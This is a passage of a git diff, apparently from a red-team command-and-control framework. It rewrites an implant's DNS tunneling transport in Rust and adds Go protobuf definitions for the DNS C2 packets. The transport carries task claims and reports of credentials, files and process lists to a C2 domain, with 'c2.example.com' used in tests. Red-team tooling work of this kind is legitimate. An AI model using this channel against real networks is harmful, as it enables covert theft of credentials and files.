- } else { - // A/AAAA: Already binary - binary_response - }; - - // Verify CRC - let actual_crc = Self::calculate_crc16(&decoded); - - // For binary chunking (A/AAAA), we only have the low byte of the CRC - // For text chunking (TXT), we have the full 16-bit CRC - let crc_match = if is_text_chunking { - actual_crc == expected_crc - } else { - (actual_crc & CRC16_LOW_BYTE_MASK) == (expected_crc & CRC16_LOW_BYTE_MASK) + // Single response (small enough to fit in one packet) + // Send FETCH packet to get response + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), + sequence: (total_chunks + 2) as u32, + conversation_id: conv_id.clone(), + data: vec![], + crc32: 0, }; - if !crc_match { - return Err(anyhow::anyhow!( - "CRC mismatch on chunked response: expected {}, got {} (low byte check: {})", - expected_crc, - actual_crc, - if is_text_chunking { - "full" - } else { - "low byte only" - } - )); - } - - #[cfg(debug_assertions)] - log::debug!( - "Successfully reassembled chunked response, {} bytes", - decoded.len() - ); - - Ok(decoded) - } - - /// Perform a DNS-based RPC exchange - async fn dns_exchange(&mut self, method: &str, data: &[u8]) -> Result> { - // Lazy initialize socket - if self.socket.is_none() { - let socket = UdpSocket::bind("0.0.0.0:0") - .await - .context("Failed to create UDP socket")?; - self.socket = Some(std::sync::Arc::new(socket)); - } - - // Calculate CRC16 of the data - let data_crc = Self::calculate_crc16(data); - - #[cfg(debug_assertions)] - log::debug!( - "DNS exchange: method={}, data_len={}, crc={}", - method, - data.len(), - data_crc - ); - - // Calculate max data size based on domain length - let max_data_size = self.calculate_max_data_size(); - - // Split RAW BINARY data into chunks (no base32 encoding yet) - let chunks: Vec> = data - .chunks(max_data_size) - .map(|chunk| chunk.to_vec()) - .collect(); - - let total_chunks = chunks.len(); - - #[cfg(debug_assertions)] - log::debug!( - "DNS exchange: chunks={}, 
max_data_size={}", - total_chunks, - max_data_size - ); - - // Step 1: Send init packet and get conversation ID - let conv_id = self.send_init(method, total_chunks, data_crc).await?; - - // Step 2: Send data chunks - self.send_chunks(&conv_id, &chunks, total_chunks).await?; + let final_response = self.send_packet(fetch_packet).await?; - // Step 3: Send end packet and get response - let last_seq = total_chunks.saturating_sub(1); - let response = self.send_end(&conv_id, last_seq).await?; - - // Step 4: Handle response (including retries for missing chunks) - self.handle_response(&conv_id, &response, &chunks, 0).await - } - - /// Perform a unary RPC call via DNS - async fn unary_rpc(&mut self, request: Req, path: &str) -> Result - where - Req: Message + Send + 'static, - Resp: Message + Default + Send + 'static, - { - // Marshal and encrypt request - let request_bytes = marshal_with_codec::(request)?; - - // Send via DNS - let response_bytes = self.dns_exchange(path, &request_bytes).await?; - - // Unmarshal and decrypt response - unmarshal_with_codec::(&response_bytes) + // Return raw response data + Ok(final_response) } } impl Transport for DNS { fn init() -> Self { DNS { - dns_server: None, - dns_resolvers: Vec::new(), - current_resolver_index: 0, base_domain: String::new(), - socket: None, - preferred_record_type: TXT_RECORD_TYPE, - current_record_type: TXT_RECORD_TYPE, - enable_fallback: true, + dns_servers: Vec::new(), + current_server_index: 0, + record_type: DnsRecordType::TXT, } } fn new(callback: String, _proxy_uri: Option) -> Result { - // URL format: dns:///[?type=TXT|A|AAAA&fallback=true|false] - // Examples: - // dns://8.8.8.8/c2.example.com - Specific server, TXT with fallback - // dns://*/c2.example.com?type=A - System resolver, prefer A records - // dns://*/c2.example.com?fallback=false - TXT only, no fallback - let url = callback.trim_start_matches(URL_SCHEME_PREFIX); - - // Split URL and query params - let (server_domain, query_params) = if let 
Some(idx) = url.find('?') { - (&url[..idx], Some(&url[idx + 1..])) + // Parse DNS URL formats: + // dns://server:port?domain=example.com&type=txt (single server, TXT records) + // dns://*?domain=example.com&type=a (use system DNS + fallbacks, A records) + // dns://8.8.8.8:53,1.1.1.1:53?domain=example.com&type=aaaa (multiple servers, AAAA records) + let url = if callback.starts_with("dns://") { + callback } else { - (url, None) + format!("dns://{}", callback) }; - let parts: Vec<&str> = server_domain.split('/').collect(); - - if parts.len() != 2 { - return Err(anyhow::anyhow!( - "Invalid DNS callback format. Expected: dns:///[?options]" - )); - } - - let dns_server = if parts[0] == SYSTEM_RESOLVER_WILDCARD { - // Use system resolver - None - } else if parts[0].contains(':') { - Some(parts[0].to_string()) - } else { - Some(format!("{}:{}", parts[0], DEFAULT_DNS_PORT)) - }; - - let base_domain = parts[1].to_string(); - - // Parse query parameters - let mut preferred_record_type = TXT_RECORD_TYPE; - let mut enable_fallback = true; - - if let Some(params) = query_params { - for param in params.split('&') { - if let Some((key, value)) = param.split_once('=') { - match key { - "type" => { - preferred_record_type = match value.to_uppercase().as_str() { - "TXT" => TXT_RECORD_TYPE, - "A" => A_RECORD_TYPE, - "AAAA" => AAAA_RECORD_TYPE, - _ => { - return Err(anyhow::anyhow!( - "Invalid record type: {}. Expected TXT, A, or AAAA", - value - )) - } - }; - } - "fallback" => { - enable_fallback = match value.to_lowercase().as_str() { - "true" | "1" | "yes" => true, - "false" | "0" | "no" => false, - _ => { - return Err(anyhow::anyhow!( - "Invalid fallback value: {}. 
Expected true or false", - value - )) - } - }; + let parsed = url::Url::parse(&url)?; + let base_domain = parsed + .query_pairs() + .find(|(k, _)| k == "domain") + .map(|(_, v)| v.to_string()) + .unwrap_or_else(|| "example.com".to_string()); + + // Parse record type from URL (default: TXT) + let record_type = parsed + .query_pairs() + .find(|(k, _)| k == "type") + .map(|(_, v)| match v.to_lowercase().as_str() { + "a" => DnsRecordType::A, + "aaaa" => DnsRecordType::AAAA, + _ => DnsRecordType::TXT, + }) + .unwrap_or(DnsRecordType::TXT); + + let mut dns_servers = Vec::new(); + + // Check if using wildcard for system DNS + if let Some(host) = parsed.host_str() { + if host == "*" { + // Use system DNS servers + fallbacks + #[cfg(feature = "dns")] + { + use hickory_resolver::system_conf::read_system_conf; + if let Ok((config, _opts)) = read_system_conf() { + for server in config.name_servers() { + dns_servers.push(format!("{}:53", server.socket_addr.ip())); } - _ => {} // Ignore unknown parameters } } + // Add fallbacks + dns_servers.extend(FALLBACK_DNS_SERVERS.iter().map(|s| s.to_string())); + } else { + // Parse comma-separated servers or single server + for server_part in host.split(',') { + let server = server_part.trim(); + let port = parsed.port().unwrap_or(53); + dns_servers.push(format!("{}:{}", server, port)); + } } } - // Build resolver array if using system resolver (dns_server is None) - let dns_resolvers = if dns_server.is_none() { - build_resolver_array() - } else { - Vec::new() - }; + // If no servers configured, use fallbacks + if dns_servers.is_empty() { + dns_servers.extend(FALLBACK_DNS_SERVERS.iter().map(|s| s.to_string())); + } Ok(DNS { - dns_server, - dns_resolvers, - current_resolver_index: 0, base_domain, - socket: None, - preferred_record_type, - current_record_type: preferred_record_type, // Start with preferred type - enable_fallback, + dns_servers, + current_server_index: 0, + record_type, }) } async fn claim_tasks(&mut self, request: 
ClaimTasksRequest) -> Result { - self.unary_rpc(request, CLAIM_TASKS_PATH).await + self.dns_exchange(request, "/c2.C2/ClaimTasks").await } async fn fetch_asset( &mut self, request: FetchAssetRequest, - tx: Sender, + sender: Sender, ) -> Result<()> { - #[cfg(debug_assertions)] - let filename = request.name.clone(); + // Send fetch request and get raw response bytes + let response_bytes = self.dns_exchange_raw( + Self::marshal_with_codec::(request)?, + "/c2.C2/FetchAsset" + ).await?; - // Marshal request - let request_bytes = marshal_with_codec::(request)?; - - // Send via DNS and get streaming response - let response_bytes = self.dns_exchange(FETCH_ASSET_PATH, &request_bytes).await?; - - // For streaming responses, we need to chunk them - // The response contains multiple FetchAssetResponse messages concatenated + // Parse length-prefixed encrypted chunks and send each one let mut offset = 0; while offset < response_bytes.len() { + // Check if we have enough bytes for length prefix if offset + 4 > response_bytes.len() { break; } - // Read message length (first 4 bytes) - let msg_len = u32::from_be_bytes([ + // Read 4-byte length prefix (big-endian) + let chunk_len = u32::from_be_bytes([ response_bytes[offset], response_bytes[offset + 1], response_bytes[offset + 2], @@ -1438,33 +588,26 @@ impl Transport for DNS { ]) as usize; offset += 4; - if offset + msg_len > response_bytes.len() { - break; + // Check if we have the full chunk + if offset + chunk_len > response_bytes.len() { + return Err(anyhow::anyhow!( + "Invalid chunk length: {} bytes at offset {}, total size {}", + chunk_len, + offset - 4, + response_bytes.len() + )); } - // Decrypt and decode message - match unmarshal_with_codec::( - &response_bytes[offset..offset + msg_len], - ) { - Ok(msg) => { - if tx.send(msg).is_err() { - #[cfg(debug_assertions)] - log::error!("Failed to send asset chunk: {}", filename); - break; - } - } - Err(_err) => { - #[cfg(debug_assertions)] - log::error!( - "Failed to 
decrypt/decode asset chunk: {}: {}", - filename, - _err - ); - break; - } + // Extract and decrypt chunk + let encrypted_chunk = &response_bytes[offset..offset + chunk_len]; + let chunk_response = Self::unmarshal_with_codec::(encrypted_chunk)?; + + // Send chunk through channel + if sender.send(chunk_response).is_err() { + return Err(anyhow::anyhow!("Failed to send chunk: receiver dropped")); } - offset += msg_len; + offset += chunk_len; } Ok(()) @@ -1474,76 +617,59 @@ impl Transport for DNS { &mut self, request: ReportCredentialRequest, ) -> Result { - self.unary_rpc(request, REPORT_CREDENTIAL_PATH).await + self.dns_exchange(request, "/c2.C2/ReportCredential").await } async fn report_file( &mut self, request: Receiver, ) -> Result { - #[cfg(debug_assertions)] - log::debug!("report_file: starting to collect chunks"); - // Spawn a task to collect chunks from the sync channel receiver // This is necessary because iterating over the sync receiver would block the async task let handle = tokio::spawn(async move { let mut all_chunks = Vec::new(); // Iterate over the sync channel receiver in a spawned task to avoid blocking - #[cfg(debug_assertions)] - let mut chunk_count = 0; - for chunk in request { - #[cfg(debug_assertions)] - { - chunk_count += 1; - } - let chunk_bytes = - marshal_with_codec::(chunk)?; + // Encrypt each chunk individually (like old implementation) + let chunk_bytes = Self::marshal_with_codec::(chunk)?; + // Prefix each chunk with its length (4 bytes, big-endian) all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); all_chunks.extend_from_slice(&chunk_bytes); } - #[cfg(debug_assertions)] - log::debug!( - "report_file: collected {} chunks, total {} bytes", - chunk_count, - all_chunks.len() - ); - Ok::, anyhow::Error>(all_chunks) }); // Wait for the spawned task to complete - let all_chunks = handle - .await - .context("Failed to join chunk collection task")??; + let all_chunks = handle.await + .map_err(|e| anyhow::anyhow!("Failed to 
join chunk collection task: {}", e))??; - // Send via DNS - let response_bytes = self.dns_exchange(REPORT_FILE_PATH, &all_chunks).await?; + if all_chunks.is_empty() { + return Err(anyhow::anyhow!("No file data provided")); + } - #[cfg(debug_assertions)] - log::debug!( - "report_file: received response, {} bytes", - response_bytes.len() - ); + // Send all chunks as a single DNS exchange (chunks are already individually encrypted) + // This is RAW data - multiple length-prefixed encrypted messages concatenated + // Do NOT encrypt again - pass directly to server + let response_bytes = self.dns_exchange_raw(all_chunks, "/c2.C2/ReportFile").await?; // Unmarshal response - unmarshal_with_codec::(&response_bytes) + Self::unmarshal_with_codec::(&response_bytes) } async fn report_process_list( &mut self, request: ReportProcessListRequest, ) -> Result { - self.unary_rpc(request, REPORT_PROCESS_LIST_PATH).await + self.dns_exchange(request, "/c2.C2/ReportProcessList").await } async fn report_task_output( &mut self, request: ReportTaskOutputRequest, ) -> Result { - self.unary_rpc(request, REPORT_TASK_OUTPUT_PATH).await + self.dns_exchange(request, "/c2.C2/ReportTaskOutput").await } async fn reverse_shell( @@ -1551,278 +677,6 @@ impl Transport for DNS { _rx: tokio::sync::mpsc::Receiver, _tx: tokio::sync::mpsc::Sender, ) -> Result<()> { - Err(anyhow::anyhow!( - "DNS transport does not support reverse shell" - )) - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_dns_init_defaults() { - let dns = DNS::init(); - - assert!(dns.dns_server.is_none()); - assert!(dns.base_domain.is_empty()); - assert_eq!(dns.preferred_record_type, TXT_RECORD_TYPE); - assert_eq!(dns.current_record_type, TXT_RECORD_TYPE); - assert!(dns.enable_fallback); - } - - #[test] - fn test_dns_new_parses_callback() { - // Test with specific DNS server - let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); - assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); - 
assert_eq!(dns.base_domain, "c2.example.com"); - assert_eq!(dns.preferred_record_type, TXT_RECORD_TYPE); - assert!(dns.enable_fallback); - - // Test with system resolver (*) - let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); - assert!(dns.dns_server.is_none()); - assert_eq!(dns.base_domain, "c2.example.com"); - - // Test with A record type preference and fallback disabled - let dns = DNS::new( - "dns://*/c2.example.com?type=A&fallback=false".to_string(), - None, - ) - .unwrap(); - assert_eq!(dns.preferred_record_type, A_RECORD_TYPE); - assert_eq!(dns.current_record_type, A_RECORD_TYPE); - assert!(!dns.enable_fallback); - } - - #[test] - fn test_dns_new_invalid_type_errors() { - let result = DNS::new("dns://8.8.8.8/c2.example.com?type=BOGUS".to_string(), None); - assert!(result.is_err()); - let err_msg = result.unwrap_err().to_string(); - assert!(err_msg.contains("type") || err_msg.contains("BOGUS")); - } - - #[test] - fn test_calculate_max_data_size_positive() { - let dns = DNS { - dns_server: None, - dns_resolvers: Vec::new(), - current_resolver_index: 0, - base_domain: "c2.example.com".to_string(), - socket: None, - preferred_record_type: TXT_RECORD_TYPE, - current_record_type: TXT_RECORD_TYPE, - enable_fallback: true, - }; - - let max_size = dns.calculate_max_data_size(); - assert!(max_size > 0, "max data size should be positive"); - - // Test with a very long base domain - should be smaller - let dns_long = DNS { - dns_server: None, - dns_resolvers: Vec::new(), - current_resolver_index: 0, - base_domain: "very.long.subdomain.hierarchy.for.testing.purposes.c2.example.com" - .to_string(), - socket: None, - preferred_record_type: TXT_RECORD_TYPE, - current_record_type: TXT_RECORD_TYPE, - enable_fallback: true, - }; - - let max_size_long = dns_long.calculate_max_data_size(); - assert!(max_size_long > 0, "long domain max size should be positive"); - assert!( - max_size_long < max_size, - "longer domain should reduce available data size" - ); 
- } - - #[test] - fn test_generate_conv_id_length() { - let id = DNS::generate_conv_id(); - assert_eq!(id.len(), CONV_ID_SIZE); - - // Verify all characters are base32 lowercase (a-z0-7) - for c in id.chars() { - assert!( - c.is_ascii_lowercase() || c.is_ascii_digit(), - "conv_id should contain only lowercase alphanumeric chars" - ); - } - } - - #[test] - fn test_encode_decode_seq() { - // Test round-trip encoding/decoding - let test_values = vec![0, 1, 42, 1234, 60466175]; // Max is 36^5 - 1 - - for val in test_values { - let encoded = DNS::encode_seq(val); - assert_eq!(encoded.len(), SEQ_SIZE); - - let decoded = DNS::decode_seq(&encoded).unwrap(); - assert_eq!(decoded, val, "seq {} should round-trip correctly", val); - } - } - - #[test] - fn test_encode_decode_base36_crc() { - // Test round-trip encoding/decoding - let test_crcs = vec![0, 1, 255, 12345, 65535]; // 16-bit values - - for crc in test_crcs { - let encoded = DNS::encode_base36_crc(crc as u16); - assert_eq!(encoded.len(), 4); - - let decoded = DNS::decode_base36_crc(&encoded).unwrap(); - assert_eq!( - decoded, crc as u16, - "CRC {} should round-trip correctly", - crc - ); - } - } - - #[test] - fn test_calculate_crc16() { - // Test with known data - let data1 = b"hello world"; - let crc1 = DNS::calculate_crc16(data1); - assert!(crc1 > 0, "CRC should be non-zero for non-empty data"); - - // Same data should produce same CRC - let crc1_again = DNS::calculate_crc16(data1); - assert_eq!(crc1, crc1_again, "CRC should be deterministic"); - - // Different data should produce different CRC (highly likely) - let data2 = b"hello world!"; - let crc2 = DNS::calculate_crc16(data2); - assert_ne!(crc1, crc2, "different data should produce different CRC"); - } - - #[tokio::test] - async fn test_handle_response_ok_prefix() { - // Create a mock DNS instance - let mut dns = DNS::init(); - dns.base_domain = "example.com".to_string(); - - // Simple test data - let test_data = b"test response data"; - let encoded_data = 
DNS::encode_base32(test_data); - let response = format!("{}{}", RESP_OK, encoded_data); - - // Call handle_response with empty chunks (no retries needed) - let conv_id = "test12345678"; - let chunks: Vec> = vec![]; - - let result = dns - .handle_response(conv_id, response.as_bytes(), &chunks, 0) - .await; - - assert!(result.is_ok()); - let decoded = result.unwrap(); - assert_eq!(decoded, test_data); - } - - #[tokio::test] - async fn test_handle_response_error_prefix() { - let mut dns = DNS::init(); - dns.base_domain = "example.com".to_string(); - - let response = b"e:something_broke"; - let conv_id = "test12345678"; - let chunks: Vec> = vec![]; - - let result = dns.handle_response(conv_id, response, &chunks, 0).await; - - assert!(result.is_err()); - let err_msg = result.unwrap_err().to_string(); - assert!(err_msg.contains("something_broke") || err_msg.contains("error")); - } - - #[tokio::test] - async fn test_handle_response_missing_prefix() { - let mut dns = DNS::init(); - dns.base_domain = "example.com".to_string(); - - // Missing chunks response - should trigger retry or error - let response = b"m:00000,00001,00002"; - let conv_id = "test12345678"; - let chunks: Vec> = vec![b"chunk0".to_vec(), b"chunk1".to_vec()]; - - // With retry_count at max, this should error out - let result = dns.handle_response(conv_id, response, &chunks, 5).await; - - // Should either error or handle the missing chunks - // Since we're at max retries, it should error - assert!(result.is_err()); - } - - #[tokio::test] - async fn test_reverse_shell_not_supported() { - let mut dns = DNS::init(); - - let (_tx, rx) = tokio::sync::mpsc::channel(1); - let (resp_tx, _resp_rx) = tokio::sync::mpsc::channel(1); - - let result = dns.reverse_shell(rx, resp_tx).await; - - assert!(result.is_err()); - let err_msg = result.unwrap_err().to_string(); - assert!(err_msg.contains("reverse shell") || err_msg.contains("not support")); - } - - #[test] - fn test_dns_new_with_wildcard_builds_resolver_array() { - 
let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); - - assert!( - dns.dns_server.is_none(), - "dns_server should be None for wildcard" - ); - assert!( - !dns.dns_resolvers.is_empty(), - "dns_resolvers array should be populated" - ); - - // Should always have at least Cloudflare and Google fallbacks - assert!( - dns.dns_resolvers.len() >= 2, - "Should have at least 2 resolvers (fallbacks)" - ); - - // Check that Cloudflare and Google are in the list (they should be at the end) - let has_cloudflare = dns.dns_resolvers.iter().any(|s| s == "1.1.1.1:53"); - let has_google = dns.dns_resolvers.iter().any(|s| s == "8.8.8.8:53"); - - assert!( - has_cloudflare, - "Should have Cloudflare (1.1.1.1:53) in resolver list" - ); - assert!( - has_google, - "Should have Google (8.8.8.8:53) in resolver list" - ); - - assert_eq!(dns.current_resolver_index, 0, "Should start at index 0"); - - #[cfg(debug_assertions)] - println!("Resolver array: {:?}", dns.dns_resolvers); - } - - #[test] - fn test_dns_new_with_explicit_server_no_resolver_array() { - let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); - - assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); - assert!( - dns.dns_resolvers.is_empty(), - "dns_resolvers should be empty with explicit server" - ); + Err(anyhow::anyhow!("reverse_shell not supported over DNS transport")) } } diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go new file mode 100644 index 000000000..00ad5e99f --- /dev/null +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -0,0 +1,414 @@ +// Code generated by protoc-gen-go. DO NOT EDIT. 
+// versions: +// protoc-gen-go v1.36.11 +// protoc v6.32.0 +// source: dns.proto + +package dnspb + +import ( + protoreflect "google.golang.org/protobuf/reflect/protoreflect" + protoimpl "google.golang.org/protobuf/runtime/protoimpl" + reflect "reflect" + sync "sync" + unsafe "unsafe" +) + +const ( + // Verify that this generated code is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion) + // Verify that runtime/protoimpl is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20) +) + +// PacketType defines the type of DNS packet in the conversation +type PacketType int32 + +const ( + PacketType_PACKET_TYPE_UNSPECIFIED PacketType = 0 + PacketType_PACKET_TYPE_INIT PacketType = 1 // Establish conversation + PacketType_PACKET_TYPE_DATA PacketType = 2 // Send data chunk + PacketType_PACKET_TYPE_END PacketType = 3 // Finalize request + PacketType_PACKET_TYPE_FETCH PacketType = 4 // Retrieve response chunk +) + +// Enum value maps for PacketType. +var ( + PacketType_name = map[int32]string{ + 0: "PACKET_TYPE_UNSPECIFIED", + 1: "PACKET_TYPE_INIT", + 2: "PACKET_TYPE_DATA", + 3: "PACKET_TYPE_END", + 4: "PACKET_TYPE_FETCH", + } + PacketType_value = map[string]int32{ + "PACKET_TYPE_UNSPECIFIED": 0, + "PACKET_TYPE_INIT": 1, + "PACKET_TYPE_DATA": 2, + "PACKET_TYPE_END": 3, + "PACKET_TYPE_FETCH": 4, + } +) + +func (x PacketType) Enum() *PacketType { + p := new(PacketType) + *p = x + return p +} + +func (x PacketType) String() string { + return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x)) +} + +func (PacketType) Descriptor() protoreflect.EnumDescriptor { + return file_dns_proto_enumTypes[0].Descriptor() +} + +func (PacketType) Type() protoreflect.EnumType { + return &file_dns_proto_enumTypes[0] +} + +func (x PacketType) Number() protoreflect.EnumNumber { + return protoreflect.EnumNumber(x) +} + +// Deprecated: Use PacketType.Descriptor instead. 
+func (PacketType) EnumDescriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{0} +} + +// DNSPacket is the main message format for DNS C2 communication +// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +type DNSPacket struct { + state protoimpl.MessageState `protogen:"open.v1"` + Type PacketType `protobuf:"varint,1,opt,name=type,proto3,enum=dns.PacketType" json:"type,omitempty"` // Packet type + Sequence uint32 `protobuf:"varint,2,opt,name=sequence,proto3" json:"sequence,omitempty"` // Chunk sequence number (0-based) + ConversationId string `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 12-character random conversation ID + Data []byte `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Chunk payload (or InitPayload for INIT packets) + Crc32 uint32 `protobuf:"varint,5,opt,name=crc32,proto3" json:"crc32,omitempty"` // Optional CRC32 for validation + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *DNSPacket) Reset() { + *x = DNSPacket{} + mi := &file_dns_proto_msgTypes[0] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *DNSPacket) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*DNSPacket) ProtoMessage() {} + +func (x *DNSPacket) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[0] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use DNSPacket.ProtoReflect.Descriptor instead. 
+func (*DNSPacket) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{0} +} + +func (x *DNSPacket) GetType() PacketType { + if x != nil { + return x.Type + } + return PacketType_PACKET_TYPE_UNSPECIFIED +} + +func (x *DNSPacket) GetSequence() uint32 { + if x != nil { + return x.Sequence + } + return 0 +} + +func (x *DNSPacket) GetConversationId() string { + if x != nil { + return x.ConversationId + } + return "" +} + +func (x *DNSPacket) GetData() []byte { + if x != nil { + return x.Data + } + return nil +} + +func (x *DNSPacket) GetCrc32() uint32 { + if x != nil { + return x.Crc32 + } + return 0 +} + +// InitPayload is the payload for INIT packets +// It contains metadata about the upcoming data transmission +type InitPayload struct { + state protoimpl.MessageState `protogen:"open.v1"` + MethodCode string `protobuf:"bytes,1,opt,name=method_code,json=methodCode,proto3" json:"method_code,omitempty"` // 2-character gRPC method code (e.g., "ct", "fa") + TotalChunks uint32 `protobuf:"varint,2,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of data chunks to expect + DataCrc32 uint32 `protobuf:"varint,3,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete request data + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *InitPayload) Reset() { + *x = InitPayload{} + mi := &file_dns_proto_msgTypes[1] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *InitPayload) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*InitPayload) ProtoMessage() {} + +func (x *InitPayload) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[1] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use 
InitPayload.ProtoReflect.Descriptor instead. +func (*InitPayload) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{1} +} + +func (x *InitPayload) GetMethodCode() string { + if x != nil { + return x.MethodCode + } + return "" +} + +func (x *InitPayload) GetTotalChunks() uint32 { + if x != nil { + return x.TotalChunks + } + return 0 +} + +func (x *InitPayload) GetDataCrc32() uint32 { + if x != nil { + return x.DataCrc32 + } + return 0 +} + +// FetchPayload is the payload for FETCH packets +// It specifies which response chunk to retrieve +type FetchPayload struct { + state protoimpl.MessageState `protogen:"open.v1"` + ChunkIndex uint32 `protobuf:"varint,1,opt,name=chunk_index,json=chunkIndex,proto3" json:"chunk_index,omitempty"` // Which chunk to fetch (0-based) + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *FetchPayload) Reset() { + *x = FetchPayload{} + mi := &file_dns_proto_msgTypes[2] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *FetchPayload) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*FetchPayload) ProtoMessage() {} + +func (x *FetchPayload) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[2] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use FetchPayload.ProtoReflect.Descriptor instead. 
+func (*FetchPayload) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{2} +} + +func (x *FetchPayload) GetChunkIndex() uint32 { + if x != nil { + return x.ChunkIndex + } + return 0 +} + +// ResponseMetadata indicates the response is chunked and must be fetched +type ResponseMetadata struct { + state protoimpl.MessageState `protogen:"open.v1"` + TotalChunks uint32 `protobuf:"varint,1,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of response chunks + DataCrc32 uint32 `protobuf:"varint,2,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete response data + ChunkSize uint32 `protobuf:"varint,3,opt,name=chunk_size,json=chunkSize,proto3" json:"chunk_size,omitempty"` // Size of each chunk (last may be smaller) + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *ResponseMetadata) Reset() { + *x = ResponseMetadata{} + mi := &file_dns_proto_msgTypes[3] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *ResponseMetadata) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ResponseMetadata) ProtoMessage() {} + +func (x *ResponseMetadata) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[3] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ResponseMetadata.ProtoReflect.Descriptor instead. 
+func (*ResponseMetadata) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{3} +} + +func (x *ResponseMetadata) GetTotalChunks() uint32 { + if x != nil { + return x.TotalChunks + } + return 0 +} + +func (x *ResponseMetadata) GetDataCrc32() uint32 { + if x != nil { + return x.DataCrc32 + } + return 0 +} + +func (x *ResponseMetadata) GetChunkSize() uint32 { + if x != nil { + return x.ChunkSize + } + return 0 +} + +var File_dns_proto protoreflect.FileDescriptor + +const file_dns_proto_rawDesc = "" + + "\n" + + "\tdns.proto\x12\x03dns\"\x9f\x01\n" + + "\tDNSPacket\x12#\n" + + "\x04type\x18\x01 \x01(\x0e2\x0f.dns.PacketTypeR\x04type\x12\x1a\n" + + "\bsequence\x18\x02 \x01(\rR\bsequence\x12'\n" + + "\x0fconversation_id\x18\x03 \x01(\tR\x0econversationId\x12\x12\n" + + "\x04data\x18\x04 \x01(\fR\x04data\x12\x14\n" + + "\x05crc32\x18\x05 \x01(\rR\x05crc32\"p\n" + + "\vInitPayload\x12\x1f\n" + + "\vmethod_code\x18\x01 \x01(\tR\n" + + "methodCode\x12!\n" + + "\ftotal_chunks\x18\x02 \x01(\rR\vtotalChunks\x12\x1d\n" + + "\n" + + "data_crc32\x18\x03 \x01(\rR\tdataCrc32\"/\n" + + "\fFetchPayload\x12\x1f\n" + + "\vchunk_index\x18\x01 \x01(\rR\n" + + "chunkIndex\"s\n" + + "\x10ResponseMetadata\x12!\n" + + "\ftotal_chunks\x18\x01 \x01(\rR\vtotalChunks\x12\x1d\n" + + "\n" + + "data_crc32\x18\x02 \x01(\rR\tdataCrc32\x12\x1d\n" + + "\n" + + "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x81\x01\n" + + "\n" + + "PacketType\x12\x1b\n" + + "\x17PACKET_TYPE_UNSPECIFIED\x10\x00\x12\x14\n" + + "\x10PACKET_TYPE_INIT\x10\x01\x12\x14\n" + + "\x10PACKET_TYPE_DATA\x10\x02\x12\x13\n" + + "\x0fPACKET_TYPE_END\x10\x03\x12\x15\n" + + 